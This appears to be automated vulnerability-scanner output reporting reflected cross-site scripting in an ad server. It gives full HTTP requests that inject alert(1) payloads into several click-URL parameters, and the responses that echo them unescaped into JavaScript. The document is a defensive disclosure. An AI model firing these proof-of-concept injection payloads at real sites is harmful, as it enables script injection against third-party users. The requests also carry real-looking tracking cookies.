GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=73347"-alert(1)-"54369acb972 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6580 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 17:31:07 GMT Expires: Sun, 20 Mar 2011 17:31:07 GMT
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... 0x600_030411_CPO_GENERIC.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=73347"-alert(1)-"54369acb972http://data.aggregateknowledge.com/pixel!t=651!?che=2987869&camid=5095412&plaid=57514523&creid=40960228&adgid=234167733&l1=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Fsplash%2Fpreowned.jsp%3Fcid%3DBAC ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89c6c'-alert(1)-'73fc593881c was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=389c6c'-alert(1)-'73fc593881c&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:36 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6814
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... 0/f/7e/%2a/n%3B234167733%3B2-0%3B0%3B57514523%3B933-120/600%3B41089600/41107387/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=389c6c'-alert(1)-'73fc593881c&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2956869%26camid%3D5095412%26plaid%3D57514523%26creid%3D41089600%26adgid%3D234167733%26l1%3Dhttp%253A ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68d2a"-alert(1)-"e05a90d3bd2 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=368d2a"-alert(1)-"e05a90d3bd2&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:32 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6736
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... = "http://s0.2mdn.net/2981993/120x600_030411_CPO_GENERIC.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=368d2a"-alert(1)-"e05a90d3bd2&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2952619%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%253A ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f31f6'-alert(1)-'d0891efa218 was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855f31f6'-alert(1)-'d0891efa218&m=3&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:28 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6736
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... /3ad0/f/7e/%2a/p%3B234167733%3B1-0%3B0%3B57514523%3B933-120/600%3B40960228/40978015/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855f31f6'-alert(1)-'d0891efa218&m=3&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2948384%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp% ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d1c2"-alert(1)-"4b605587bb4 was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=5138555d1c2"-alert(1)-"4b605587bb4&m=3&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:23 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6778
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... gif = "http://s0.2mdn.net/2981993/120x600_031811_FREE_PHONES.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=5138555d1c2"-alert(1)-"4b605587bb4&m=3&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2943603%26camid%3D5095412%26plaid%3D57514523%26creid%3D41205115%26adgid%3D234167733%26l1%3Dhttp% ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98471'-alert(1)-'72c05b45424 was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=5411398471'-alert(1)-'72c05b45424&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:45 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6789
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... /a%3B234167733%3B0-0%3B0%3B57514523%3B933-120/600%3B40789782/40807569/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=5411398471'-alert(1)-'72c05b45424&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2965384%26camid%3D5095412%26plaid%3D57514523%26creid%3D40789782%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252F ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f733"-alert(1)-"083c600f6c8 was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=541135f733"-alert(1)-"083c600f6c8&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:40 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6736
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... /s0.2mdn.net/2981993/120x600_030411_CPO_GENERIC.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=541135f733"-alert(1)-"083c600f6c8&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2961119%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252F ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd29a"-alert(1)-"95130e758d8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134dd29a"-alert(1)-"95130e758d8&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:14 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6778
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... S.swf"; var gif = "http://s0.2mdn.net/2981993/120x600_031811_FREE_PHONES.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134dd29a"-alert(1)-"95130e758d8&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2934962%26camid%3D5095412%26plaid%3D57514523%26creid%3D41205115%26adgid%3D234167733%2 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57012'-alert(1)-'cc2251629ad was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=23213457012'-alert(1)-'cc2251629ad&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:19 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:19 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6778
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... ck%3Bh%3Dv8/3ad0/f/7e/%2a/g%3B234167733%3B3-0%3B0%3B57514523%3B933-120/600%3B41205115/41222902/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=23213457012'-alert(1)-'cc2251629ad&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2939384%26camid%3D5095412%26plaid%3D57514523%26creid%3D41205115%26adgid%3D234167733%2 ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa4b0"-alert(1)-"3a43cb8c8f2 was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3fa4b0"-alert(1)-"3a43cb8c8f2&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:59 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6778
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... net/2981993/120x600_031811_FREE_PHONES.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3fa4b0"-alert(1)-"3a43cb8c8f2&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2979416%26camid%3D5095412%26plaid%3D57514523%26creid%3D41205115%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252Fwww.veriz ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62c27'-alert(1)-'c032322ba12 was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=362c27'-alert(1)-'c032322ba12&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:31:03 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:31:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6789
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... 67733%3B0-0%3B0%3B57514523%3B933-120/600%3B40789782/40807569/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=362c27'-alert(1)-'c032322ba12&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2983634%26camid%3D5095412%26plaid%3D57514523%26creid%3D40789782%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252Fwww.veriz ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dad7c"-alert(1)-"cc5c582c61a was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0dad7c"-alert(1)-"cc5c582c61a&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:16:55 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:16:55 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0dad7c"-alert(1)-"cc5c582c61a&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den"); var fscU ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 196a4'-alert(1)-'232e8879f was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0196a4'-alert(1)-'232e8879f&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:16:59 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:16:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6122
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et/click%3Bh%3Dv8/3ad0/f/7c/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0196a4'-alert(1)-'232e8879f&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den\"> ...[SNIP]...
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 406a9'-alert(1)-'46cf963601 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
